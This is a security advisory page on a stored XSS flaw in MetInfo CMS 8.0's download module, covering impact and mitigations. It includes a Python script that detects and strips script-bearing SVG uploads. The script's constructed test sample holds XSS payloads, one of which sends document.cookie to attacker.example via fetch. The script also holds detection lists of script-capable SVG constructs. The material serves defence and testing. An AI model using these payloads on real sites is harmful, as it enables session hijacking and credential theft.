CVE-2025-60452: n/a
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the download management module, specifically in the app\system\download\admin\download_admin.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users.
AI Analysis
Technical Summary
CVE-2025-60452 is a stored Cross-Site Scripting (XSS) vulnerability in MetInfo CMS version 8.0, in the download management module at app\system\download\admin\download_admin.class.php. The module accepts uploads of SVG (Scalable Vector Graphics) files without removing the script-capable parts of the format, so an attacker can store an SVG that carries JavaScript (a <script> element, an on* event handler such as onload, or a javascript: URL in an href) and it persists on the server like any other download. When a user later opens the file through the CMS, the browser renders it as a document and runs the embedded script in the origin of the site that served it. That last point is the practical caveat: browsers execute script in an SVG only when it is loaded as a document (navigated to directly, or embedded through <object>, <embed> or <iframe>); an SVG referenced from an <img> tag or a CSS background does not run script. Stored XSS is more dangerous than the reflected kind because the payload is served to every user who opens the file, administrators included, and it needs no interaction beyond opening it. The attack exploits the fact that SVG is both an image format and an XML document that may contain script, so an upload filter that blocks .php or .html but allows "images" lets it through. Consequences include session hijacking, credential theft, defacement, and further attacks launched from the victim's browser. The affected component sits under the back-end (admin) path of the module; the advisory does not state which privilege level is needed to reach the upload function. No CVSS score has been assigned, and there are no known exploits in the wild at the time of publication. The affected version is MetInfo CMS 8.0, a content management system used for website administration and content delivery.
Potential Impact
For European organizations running MetInfo CMS version 8.0, this vulnerability threatens the confidentiality and integrity of their web applications and user data. An attacker who gets a malicious SVG stored through the download module can execute arbitrary JavaScript in the browsers of site visitors or administrators who open it. If uploads are served from the same origin as the CMS, that script can read session cookies that are not flagged HttpOnly, issue authenticated requests to the back-end in the victim's name, and capture credentials typed into forms. That can lead to takeover of administrative functions or user accounts, data leakage, and reputational damage. Because the payload is persistent, it can also be used to host phishing content or redirect visitors to malware. The impact is higher for organizations that run critical business operations on MetInfo CMS or process personal data under the GDPR, where a compromise can bring compliance findings and financial penalties. Availability impact is generally low for XSS, though defacement and loss of user trust can affect business continuity. The affected component is located under the admin path of the download module; the advisory does not say which account level can reach the upload function, so every account with access to the download management back-end should be treated as a possible source of the payload. With no patch available at the time of disclosure, the risk stays elevated until an update or the workarounds below are in place.
Mitigation Recommendations
European organizations should immediately review and restrict file upload functionality in MetInfo CMS, especially in the download management module. Specific mitigations:
1) Disallow SVG uploads in the download module entirely if they are not needed. Where they are, validate on the server side and reject (or strip) any SVG carrying <script>, on* event-handler attributes, javascript: or data:image/svg+xml URLs in href/xlink:href, <foreignObject>, or SMIL animation of href; also refuse documents with a DOCTYPE or ENTITY declaration. Check the content, not the extension or the client-supplied MIME type. Where SVG is only needed as an image, rasterizing it to PNG on upload removes the problem outright.
2) Serve user-uploaded files in a way the browser will not execute: Content-Disposition: attachment and X-Content-Type-Options: nosniff on the download responses, or host uploads on a separate, cookie-less origin so that any script that does run has no access to the CMS session.
3) Apply a Content Security Policy to the responses that serve uploaded files (for example a sandbox directive, or a script-src that forbids inline script). A CSP set only on the site's HTML pages does not cover an SVG opened as a top-level document, because the policy that applies is the one delivered with the SVG response itself.
4) Limit upload rights in the download module to trusted administrators and monitor upload logs for unexpected .svg files or uploads from unusual accounts.
5) Audit the CMS regularly and update to the fixed version as soon as a patch is published.
6) Make administrators aware that opening an uploaded file in the back-end is itself the trigger; previews of untrusted uploads should go through a sandboxed viewer or not happen at all.
7) Consider a web application firewall with rules that inspect multipart upload bodies for script-bearing SVG, treating it as a backstop rather than a substitute for server-side validation.
These steps address the specific vector (script-bearing SVG uploads) and the affected module, and reduce the attack surface until an official patch is released.
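The server-side check described in points 1 and 2 above, covering the script-bearing SVG constructs named in the technical summary, as an added example. This is not MetInfo's own code: the function names, the "reject" versus "sanitize" modes and the three sample SVG documents are all constructed for the example. It is written in Python so that it runs stand-alone, either over a directory of existing uploads or in front of the upload handler; in a real deployment the same logic would be ported into the PHP upload path.

```python
"""Server-side SVG upload check (added example, not MetInfo CMS code).

find_active_content(data) lists every script-capable construct in an SVG.
sanitize(data)            strips those constructs and re-serializes.
check_upload(name, data)  is the policy wrapper an upload handler would call.
Standard library only. xml.etree does not fetch external entities, but any
document with a DOCTYPE/ENTITY is refused before parsing, which also avoids
entity-expansion (billion laughs) DoS against this check itself.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that run script or embed a foreign (HTML) document inside the SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# SMIL animation elements can retarget an href to a javascript: URL at runtime.
ANIMATION_ELEMENTS = {"set", "animate", "animateMotion"}
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}
URL_VALUED_ATTRS = {"values", "to", "from"}  # animation target values
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|vbscript)\s*:", re.I)
DATA_URI = re.compile(r"^\s*data:\s*([\w.+/-]*)", re.I)
RASTER_MIME = {"image/png", "image/jpeg", "image/gif", "image/webp"}
ENTITY_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)", re.I)


def _local(name):
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return name.rsplit("}", 1)[-1]


def _unsafe_url(value):
    """javascript:/vbscript: URLs, plus data: URLs that are not plain raster images
    (an SVG carried in a data: href is a known script vector; embedded PNGs are fine)."""
    if ACTIVE_SCHEME.match(value):
        return True
    m = DATA_URI.match(value)
    return bool(m) and m.group(1).lower() not in RASTER_MIME


def _animates_href(el):
    return (_local(el.tag) in ANIMATION_ELEMENTS
            and el.get("attributeName", "").split(":")[-1] == "href")


def _bad_attrs(el):
    """Attribute names on el that can trigger script (onload=..., href=javascript:...)."""
    bad = []
    for attr, value in el.attrib.items():
        aname = _local(attr)
        if aname.lower().startswith("on"):
            bad.append(attr)
        elif (attr in HREF_ATTRS or aname in URL_VALUED_ATTRS) and _unsafe_url(value):
            bad.append(attr)
    return bad


def find_active_content(data):
    """Human-readable findings; an empty list means nothing script-capable was seen."""
    if ENTITY_MARKERS.search(data):
        return ["DOCTYPE/ENTITY declaration present (refused without parsing)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element <{_local(root.tag)}> is not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        if _animates_href(el):
            findings.append(f"<{name}> animating href")
        findings.extend(f"{_local(a)}={el.attrib[a][:40]!r} on <{name}>" for a in _bad_attrs(el))
    return findings


def sanitize(data):
    """Remove script-capable elements/attributes and re-serialize.
    Raises ValueError for documents that should be rejected rather than repaired."""
    if ENTITY_MARKERS.search(data):
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    root = ET.fromstring(data)  # ParseError propagates to the caller
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):  # materialize first, the loop mutates the tree
        if _local(el.tag) in ACTIVE_ELEMENTS or _animates_href(el):
            parents[el].remove(el)  # root is <svg>, so it is never removed here
            continue
        for attr in _bad_attrs(el):
            del el.attrib[attr]
    ET.register_namespace("", SVG_NS)  # keep the default xmlns instead of ns0: prefixes
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root)


def looks_like_svg(filename, data):
    """Decide by extension or by content; the browser trusts the served type, not the name."""
    return filename.lower().endswith((".svg", ".svgz")) or b"<svg" in data.lstrip()[:512].lower()


def check_upload(filename, data, mode="reject"):
    """Policy wrapper. Returns ('accept', bytes), ('sanitized', bytes) or ('reject', [reasons])."""
    if not looks_like_svg(filename, data):
        return "accept", data  # other formats need their own checks
    findings = find_active_content(data)
    if not findings:
        return "accept", data
    if mode == "sanitize":
        try:
            return "sanitized", sanitize(data)
        except (ET.ParseError, ValueError) as exc:
            return "reject", findings + [f"cannot sanitize: {exc}"]
    return "reject", findings


# Constructed sample documents for the example (not real uploads).
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <rect width="10" height="10"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
  <set attributeName="xlink:href" to="javascript:alert(2)"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(3)"/></body></foreignObject>
</svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" fill="#09f"/>
  <image href="data:image/png;base64,iVBORw0KGgo=" width="1" height="1"/>
</svg>"""
ENTITY_SVG = b"""<!DOCTYPE svg [<!ENTITY x "a">]><svg xmlns="http://www.w3.org/2000/svg">&x;</svg>"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG), ("entity", ENTITY_SVG)):
        decision, payload = check_upload(f"{label}.svg", doc, mode="sanitize")
        print(label, "->", decision, payload if isinstance(payload, list) else f"{len(payload)} bytes")
```

Run it as a script to see the three decisions. In production prefer the reject mode: a deny-list sanitizer like this one has to chase every new browser feature, whereas refusing the file, allow-listing elements and attributes, or rasterizing to PNG does not. The `data:` handling is deliberately narrow (raster image MIME types only), because embedded PNGs in `<image>` are common in legitimate files while an SVG carried in a `data:` href is not.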
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2025-09-26T00:00:00.000Z
- Cvss Version: null
- State: PUBLISHED
Threat ID: 68dfd2c47375cad79a842398
Added to database: 10/3/2025, 1:42:28 PM
Last enriched: 10/3/2025, 1:43:12 PM
Last updated: 10/7/2025, 12:01:24 AM